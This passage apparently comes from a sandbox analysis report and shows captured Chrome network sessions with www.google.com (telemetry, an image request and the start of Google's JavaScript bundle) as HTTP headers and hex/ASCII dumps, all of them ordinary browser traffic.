b0 10 36 be 4b b9 7c b6 54 ae d8 26 d7 d8 b2 Data Ascii: :d^dM;Bz'O2w%B"RvY>PD\O88KaZ2uq)H]Y\v@"klV^2kqr:Xa!PcOlqO>5X>'d{ZXFHk3v'ypv8*Iv.?6K\|T&
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: 2b c1 c7 b2 a9 e8 7a a3 79 cc 55 eb 0e b8 a7 f7 66 87 b7 db 1b f6 03 ac 25 64 89 ec 98 7a d3 6f 80 b5 52 c5 e5 37 7e d4 5e e1 64 7a 36 5b d1 81 30 96 ec 9f c0 f6 cd f4 14 a9 90 0d 41 c1 00 e4 cb 16 80 16 a2 3d 70 7c c9 44 4a 7f ef cc fc fb 08 dc f9 ef eb 5e 8e 89 bd 74 2d c3 2f a0 0d b5 47 bc d3 6b b0 6c f8 bb 67 cf 9f 83 ed c6 c6 e3 27 00 fb 94 6b 5b 34 60 b2 64 a7 56 e1 f3 43 9a 85 87 0a e7 2a 58 29 f0 92 e4 a4 2c 20 bd fb 7b 56 b2 33 ad 91 f6 8b dd 11 07 bb 96 8a ae 37 2e 67 8d 6d 84 1b a4 41 2a 88 7a 7d 83 bb 21 3b 60 78 76 48 0e fa 19 ac 45 40 8a 4b c6 ca 95 18 16 7f 3d 99 8e c5 2e e7 33 b1 d8 04 da d7 89 89 50 30 9f c9 07 a3 18 a9 9f a9 d5 3c 83 38 36 9f 2f 14 4a f1 52 3c a5 a3 3f f3 fb 31 3e 70 bb cb b6 58 b2 52 a6 c2 c0 df 8f 9c d8 bb 86 ed a4 6d Data Ascii: +zyUf%dzoR7~^dz6[0A=p\|DJ^t-/Gklg'k[4`dVCX), {V37.gmAz}!;`xvHE@K=.3P0<86/JR<?1>pXRm
2024-09-26 15:55:26 UTC	1390	IN	Data Raw: e8 5a b4 5e 68 2d 79 82 93 63 56 cb d6 6a c9 0a 72 23 1b 8a 92 a7 43 14 24 b8 16 8c e0 2f e0 83 1e 7c 87 c2 74 ba 8c 41 56 9c f6 cb 6f 8e f4 8f a6 2a 54 d4 c5 41 d9 20 db 2d 3c 4b 2f 20 fb dd 77 02 ec bd 7b 9b 9b cf 37 a0 67 e3 0d 76 a5 f1 55 a3 fd a3 47 8f 1e ca 28 be 0e 08 5a 9e 78 cd 58 db 58 75 1c 69 00 b2 60 8c bf f9 e0 90 66 5a 35 26 8b 32 e2 d0 d2 a0 a3 d3 a9 6a 11 b5 fd cc d5 3d 9e bd b9 d7 b2 03 66 b6 13 c3 6a f7 88 5f 96 27 a0 32 5a a8 9b 2b 98 02 60 a6 92 29 64 07 03 9e 5a 1d db b5 20 5c 0b 03 02 2a d7 02 d7 56 72 f3 66 2d 2c cc 0f 95 0a b9 2c b8 e2 a7 81 62 37 98 0d 05 f0 e9 0b c6 f2 46 68 11 b6 b4 fc ad 15 f5 ca 28 76 db 31 28 2b 63 cf dc cf 68 fb fb b4 31 f2 ec 15 70 45 d0 7e 47 7a 75 b6 51 22 35 14 1b e9 2c 92 fd ff 6c 6f 6f d8 e5 87 0f 1f Data Ascii: Z^h-ycVjr#C$/\|tAVoTA -<K/ w{7gvUG(ZxXXui`fZ5&2j=fj_'2Z+`)dZ \Vrf-,,b7Fh(v1(+ch1pE~GzuQ"5,loo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.16	49723	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:26 UTC	1562	OUT	POST /gen_204?s=webhp&t=aft&atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&rt=wsrt.2066,aft.1476,afti.1476,cbt.97,hst.35,prt.1023&imn=11&ima=1&imad=0&imac=1&wh=907&aftie=NF&aft=1&aftp=907&opi=89978449&ts=204102 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:26 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-R0GUizbKTZYB1BBI3CJtbg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:26 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.16	49724	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:26 UTC	763	OUT	GET /images/searchbox/desktop_searchbox_sprites318_hr.webp HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:26 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/webp Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 660 Date: Thu, 26 Sep 2024 15:55:26 GMT Expires: Thu, 26 Sep 2024 15:55:26 GMT Cache-Control: private, max-age=31536000 Last-Modified: Wed, 22 Apr 2020 22:00:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:26 UTC	660	IN	Data Raw: 52 49 46 46 8c 02 00 00 57 45 42 50 56 50 38 4c 80 02 00 00 2f 27 c0 1e 10 d5 48 76 b6 3d 6e 95 fb bf 0a bb 07 b8 51 ea d8 9f 99 61 e5 e8 28 52 76 0c 6f ab da 55 98 1c c6 fe ea 8a 99 6c 18 b6 6d 1b a6 ff 1f dc da f4 06 30 6c db 36 6c ae ed 66 da 0c b1 ed 09 a4 90 41 3f 42 08 43 98 41 19 94 c1 32 68 06 9d 41 67 30 84 10 0e e1 47 38 07 6e 23 29 52 ba 6a f1 78 a0 e6 be 50 9e 46 e5 ce 49 3b cc 4f 78 a1 e7 c7 cf f5 1c 37 2d f7 c8 cf 62 58 9e 2f eb c0 5d c5 88 96 af 33 cb b8 1c 54 80 ab 93 e1 a2 35 b7 ba 01 78 ee ac da f6 47 2e 43 09 aa 19 e0 b7 25 e2 75 03 8e 19 f9 14 75 2f 97 5f b4 3d f0 b2 94 98 bc 10 3c 21 71 06 5c 86 f8 07 39 02 f7 de b2 c2 15 5c f7 a6 1a 07 70 3a 14 bc 50 f8 34 1f 61 53 00 4e 29 9c 3e b0 3e 18 ae 22 06 db 83 39 99 e0 56 68 20 a7 aa d0 80 Data Ascii: RIFFWEBPVP8L/'Hv=nQa(RvoUlm0l6lfA?BCA2hAg0G8n#)RjxPFI;Ox7-bX/]3T5xG.C%uu/_=<!q\9\p:P4aSN)>>"9Vh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.16	49727	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:26 UTC	3350	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=1/ed=1/dg=3/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplu [TRUNCATED] Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; NID=517=AmejulbRjs41gm5HAh0KNWIbESmYMNZ1axMfLtSSaMj3ipS3W-ZIczoXLjeaRFrsNlCKVipoFABp4RnsYthLAR_8X_MjQNiqFRyKiEcC7JOYrvXd8n41SO2Dq_friOqzZJv7SdIo1yrE5-GOgKAzqwIB7IqmX4e1csjhzX78XTAVb9Og_NFq0OtWtOB7198KZzuO
2024-09-26 15:55:27 UTC	831	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1037389 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:55:50 GMT Expires: Fri, 26 Sep 2025 08:55:50 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25176 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:27 UTC	559	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0// Copyright Google LLC SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Id
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 61 2c 45 63 61 2c 46 63 61 2c 47 63 61 2c 41 63 61 2c 48 63 61 2c 42 63 61 2c 49 63 61 2c 7a 63 61 2c 4a 63 61 2c 79 63 61 2c 4b 63 61 2c 4d 63 61 2c 54 63 61 2c 56 63 61 2c 57 63 61 2c 24 63 61 2c 61 64 61 2c 65 64 61 2c 68 64 61 2c 62 64 61 2c 67 64 61 2c 66 64 61 2c 64 64 61 2c 63 64 61 2c 69 64 61 2c 6a 64 61 2c 6e 64 61 2c 70 64 61 2c 6f 64 61 2c 73 64 61 2c 74 64 61 2c 75 64 61 2c 77 64 61 2c 79 64 61 2c 78 64 61 2c 41 64 61 2c 42 64 61 2c 43 64 61 2c 45 64 61 2c 46 64 61 2c 47 64 61 2c 48 64 61 2c 49 64 61 2c 4c 64 61 2c 4d 64 61 2c 4e 64 61 2c 52 64 61 2c 51 64 61 2c 55 64 61 2c 56 64 61 2c 24 64 61 2c 61 65 61 2c 62 65 61 2c 64 65 61 2c 63 65 61 2c 66 65 61 2c 65 65 61 2c 69 65 61 2c 68 65 61 2c 6b 65 61 2c 6d 65 61 2c 70 65 61 2c 71 65 61 2c 74 Data Ascii: a,Eca,Fca,Gca,Aca,Hca,Bca,Ica,zca,Jca,yca,Kca,Mca,Tca,Vca,Wca,$ca,ada,eda,hda,bda,gda,fda,dda,cda,ida,jda,nda,pda,oda,sda,tda,uda,wda,yda,xda,Ada,Bda,Cda,Eda,Fda,Gda,Hda,Ida,Lda,Mda,Nda,Rda,Qda,Uda,Vda,$da,aea,bea,dea,cea,fea,eea,iea,hea,kea,mea,pea,qea,t
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 53 74 61 63 6b 54 72 61 63 65 29 45 72 72 6f 72 2e 63 61 70 74 75 72 65 53 74 61 63 6b 54 72 61 63 65 28 74 68 69 73 2c 5f 2e 61 61 29 3b 65 6c 73 65 7b 76 61 72 20 63 3d 45 72 72 6f 72 28 29 2e 73 74 61 63 6b 3b 63 26 26 28 74 68 69 73 2e 73 74 61 63 6b 3d 63 29 7d 61 26 26 28 74 68 69 73 2e 6d 65 73 73 61 67 65 3d 53 74 72 69 6e 67 28 61 29 29 3b 62 21 3d 3d 76 6f 69 64 20 30 26 26 28 74 68 69 73 2e 63 61 75 73 65 3d 62 29 7d 3b 5f 2e 61 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 73 70 6c 69 74 28 22 25 73 22 29 3b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 61 2e 6c 65 6e 67 74 68 2d 31 2c 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 63 2b 3d 61 5b 65 5d 2b 28 65 3c 62 2e 6c 65 6e 67 74 68 3f 62 5b 65 5d 3a 22 25 73 22 29 3b 5f 2e 61 61 2e Data Ascii: StackTrace)Error.captureStackTrace(this,_.aa);else{var c=Error().stack;c&&(this.stack=c)}a&&(this.message=String(a));b!==void 0&&(this.cause=b)};_.aaa=function(a,b){a=a.split("%s");for(var c="",d=a.length-1,e=0;e<d;e++)c+=a[e]+(e<b.length?b[e]:"%s");_.aa.
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 61 3d 76 6f 69 64 20 30 29 3b 74 68 72 6f 77 20 66 3b 7d 7d 3b 0a 5f 2e 6c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 21 31 3a 62 3b 69 66 28 69 61 61 29 7b 69 66 28 62 26 26 28 6a 61 61 3f 21 61 2e 69 73 57 65 6c 6c 46 6f 72 6d 65 64 28 29 3a 2f 28 3f 3a 5b 5e 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 7c 5e 29 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 7c 5b 5c 75 44 38 30 30 2d 5c 75 44 42 46 46 5d 28 3f 21 5b 5c 75 44 43 30 30 2d 5c 75 44 46 46 46 5d 29 2f 2e 74 65 73 74 28 61 29 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 4f 22 29 3b 61 3d 28 6b 61 61 7c 7c 28 6b 61 61 3d 6e 65 77 20 54 65 78 74 45 6e 63 6f 64 65 72 29 29 2e 65 6e 63 6f 64 65 28 61 29 7d 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 63 3d 30 Data Ascii: a=void 0);throw f;}};_.laa=function(a,b){b=b===void 0?!1:b;if(iaa){if(b&&(jaa?!a.isWellFormed():/(?:[^\uD800-\uDBFF]\|^)[\uDC00-\uDFFF]\|[\uD800-\uDBFF](?![\uDC00-\uDFFF])/.test(a)))throw Error("O");a=(kaa\|\|(kaa=new TextEncoder)).encode(a)}else{for(var c=0
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 21 31 3a 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 75 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 71 61 61 28 29 3f 6e 61 61 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 5f 2e 69 61 28 22 45 64 67 2f 22 29 7d 3b 0a 5f 2e 76 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 46 69 72 65 66 6f 78 22 29 7c 7c 5f 2e 69 61 28 22 46 78 69 4f 53 22 29 7d 3b 5f 2e 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 6a 61 28 29 7c 7c 28 5f 2e 71 61 61 28 29 3f 30 3a 5f 2e 69 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 72 61 61 28 29 7c 7c 5f 2e 74 61 Data Ascii: nction(){return _.qaa()?!1:_.ia("Edge")};_.uaa=function(){return _.qaa()?naa("Microsoft Edge"):_.ia("Edg/")};_.vaa=function(){return _.ia("Firefox")\|\|_.ia("FxiOS")};_.la=function(){return _.ia("Safari")&&!(_.ja()\|\|(_.qaa()?0:_.ia("Coast"))\|\|_.raa()\|\|_.ta
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 6c 65 73 73 43 68 72 6f 6d 65 22 5d 29 7d 72 65 74 75 72 6e 20 61 3d 3d 3d 22 46 69 72 65 66 6f 78 22 26 26 5f 2e 76 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 61 66 61 72 69 22 26 26 5f 2e 6c 61 28 29 7c 7c 61 3d 3d 3d 22 41 6e 64 72 6f 69 64 20 42 72 6f 77 73 65 72 22 26 26 5f 2e 78 61 61 28 29 7c 7c 61 3d 3d 3d 22 53 69 6c 6b 22 26 26 5f 2e 77 61 61 28 29 3f 28 61 3d 62 5b 32 5d 29 26 26 0a 61 5b 31 5d 7c 7c 22 22 3a 22 22 7d 3b 5f 2e 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 5f 2e 71 61 61 28 29 26 26 61 21 3d 3d 22 53 69 6c 6b 22 29 7b 76 61 72 20 62 3d 5f 2e 65 61 2e 62 72 61 6e 64 73 2e 66 69 6e 64 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 63 2e 62 72 61 6e 64 3d 3d 3d 61 7d 29 3b 69 66 28 21 62 7c 7c 21 62 2e 76 65 72 73 Data Ascii: lessChrome"])}return a==="Firefox"&&_.vaa()\|\|a==="Safari"&&_.la()\|\|a==="Android Browser"&&_.xaa()\|\|a==="Silk"&&_.waa()?(a=b[2])&&a[1]\|\|"":""};_.Baa=function(a){if(_.qaa()&&a!=="Silk"){var b=_.ea.brands.find(function(c){return c.brand===a});if(!b\|\|!b.vers
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 5d 29 3b 72 65 74 75 72 6e 20 62 7c 7c 22 22 7d 3b 0a 5f 2e 4b 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 70 61 28 5f 2e 4a 61 61 28 29 2c 61 29 3e 3d 30 7d 3b 5f 2e 71 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 7d 3b 5f 2e 72 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 66 6f 72 28 76 61 72 20 64 3d 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3f 61 2e 73 70 6c 69 74 28 22 22 29 3a 61 2c 65 3d 61 2e 6c 65 6e 67 74 68 2d 31 3b 65 3e 3d 30 3b 2d 2d 65 29 65 20 69 6e 20 64 26 26 62 2e 63 61 6c 6c 28 63 2c 64 5b 65 5d 2c 65 2c 61 29 7d 3b 5f 2e 4c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 62 3d 5f 2e 73 61 28 61 2c 62 2c 63 29 3b 72 65 Data Ascii: ]);return b\|\|""};_.Kaa=function(a){return _.pa(_.Jaa(),a)>=0};_.qa=function(a){return a[a.length-1]};_.ra=function(a,b,c){for(var d=typeof a==="string"?a.split(""):a,e=a.length-1;e>=0;--e)e in d&&b.call(c,d[e],e,a)};_.Laa=function(a,b,c){b=_.sa(a,b,c);re
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 5f 2e 41 61 28 64 29 29 7b 76 61 72 20 65 3d 61 2e 6c 65 6e 67 74 68 7c 7c 30 2c 66 3d 64 2e 6c 65 6e 67 74 68 7c 7c 30 3b 61 2e 6c 65 6e 67 74 68 3d 65 2b 66 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 3b 67 2b 2b 29 61 5b 65 2b 67 5d 3d 64 5b 67 5d 7d 65 6c 73 65 20 61 2e 70 75 73 68 28 64 29 7d 7d 3b 5f 2e 55 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 61 70 70 6c 79 28 61 2c 54 61 61 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 29 7d 3b 54 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3c 3d 32 3f 41 72 72 61 79 2e 70 72 6f 74 6f 74 Data Ascii: ments[c];if(_.Aa(d)){var e=a.length\|\|0,f=d.length\|\|0;a.length=e+f;for(var g=0;g<f;g++)a[e+g]=d[g]}else a.push(d)}};_.Uaa=function(a,b,c,d){return Array.prototype.splice.apply(a,Taa(arguments,1))};Taa=function(a,b,c){return arguments.length<=2?Array.protot
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 72 61 79 28 64 29 29 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 3b 65 2b 3d 38 31 39 32 29 7b 76 61 72 20 66 3d 54 61 61 28 64 2c 65 2c 65 2b 38 31 39 32 29 3b 66 3d 5f 2e 63 62 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 66 29 3b 66 6f 72 28 76 61 72 20 67 3d 30 3b 67 3c 66 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 62 2e 70 75 73 68 28 66 5b 67 5d 29 7d 65 6c 73 65 20 62 2e 70 75 73 68 28 64 29 7d 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 64 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 66 61 28 5f 2e 64 61 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 22 77 65 62 6b 69 74 22 29 26 26 21 5f 2e 69 61 28 22 45 64 67 65 22 29 7d 3b 5f 2e 65 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 69 61 28 22 47 Data Ascii: ray(d))for(var e=0;e<d.length;e+=8192){var f=Taa(d,e,e+8192);f=_.cba.apply(null,f);for(var g=0;g<f.length;g++)b.push(f[g])}else b.push(d)}return b};_.dba=function(){return _.fa(_.da().toLowerCase(),"webkit")&&!_.ia("Edge")};_.eba=function(){return _.ia("G
2024-09-26 15:55:27 UTC	1390	IN	Data Raw: 3a 21 31 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 22 29 3b 7d 3b 73 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 42 69 67 49 6e 74 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 7d 3b 0a 5f 2e 76 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 74 62 61 3b 69 66 28 21 75 62 61 28 61 29 29 7b 76 61 72 20 63 2c 64 3b 62 3d 28 64 3d 28 63 3d 74 79 70 65 6f 66 20 62 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 28 29 3a 62 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 63 2e 63 6f 6e 63 61 74 28 22 5c 6e 22 29 29 21 3d 6e 75 6c 6c 3f 64 3a 22 22 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 60 22 2b 62 2b 22 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 7d 3b 5f 2e 77 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b Data Ascii: :!1};throw Error("T");};sba=function(){return typeof BigInt==="function"};_.vba=function(a){var b=tba;if(!uba(a)){var c,d;b=(d=(c=typeof 